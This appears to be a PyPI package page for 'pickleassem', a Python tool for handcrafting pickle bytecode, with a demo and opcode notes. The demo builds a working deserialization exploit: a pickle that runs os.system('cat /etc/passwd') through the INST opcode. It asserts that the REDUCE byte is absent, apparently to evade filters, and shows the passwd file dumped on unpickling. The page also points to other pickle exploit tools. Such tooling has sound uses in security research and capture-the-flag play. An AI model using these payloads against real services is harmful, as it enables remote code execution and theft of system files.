A simple pickle assembler to make handcrafting pickle bytecode easier.
Project description
pickleassem
A simple pickle assembler to make handcrafting pickle bytecode easier.
Demo
import pickle
import pickletools
from pickleassem import PickleAssembler
pa = PickleAssembler(proto=4)
pa.push_mark()
pa.push_short_binunicode('cat /etc/passwd')
pa.build_inst('os', 'system')
payload = pa.assemble()
assert b'R' not in payload
print(payload)
pickletools.dis(payload, annotate=1)
pickle.loads(payload)
Output:
b'\x80\x04(\x8c\x0fcat /etc/passwdios\nsystem\n.'
0: \x80 PROTO 4 Protocol version indicator.
2: ( MARK Push markobject onto the stack.
3: \x8c SHORT_BINUNICODE 'cat /etc/passwd' Push a Python Unicode string object.
20: i INST 'os system' (MARK at 2) Build a class instance.
31: . STOP Stop the unpickling machine.
highest protocol among opcodes = 4
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
...
0
Installation
Install with pip: pip install -U pickleassem
Documentation
Just refer to the source code. Each method of PickleAssembler
whose name begins with push
, build
, pop
or memo
corresponds to a pickle opcode.
The following opcodes and corresponding features are not implemented: PERSID
, BINPERSID
, EXT1
, EXT2
, EXT4
, FRAME
, NEXT_BUFFER
, READONLY_BUFFER
.
See Also
Other tools for pickle exploit:
anapickle
: slides, repopwnypack.pickle
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
pickleassem-1.0.0.tar.gz
(8.3 kB
view hashes)
Built Distribution
Close
Hashes for pickleassem-1.0.0-py3-none-any.whl
Algorithm | Hash digest | |
---|---|---|
SHA256 | 1d833a0f419d6d7a1d9367396645c43be320e60d873b79cab23b22825e75f095 |
|
MD5 | 60789fe34c03cf7992b33f5b771f0256 |
|
BLAKE2b-256 | b501f816c5b5e5f92abb6589661c40d99e05a04488c64001f7feec986ca50825 |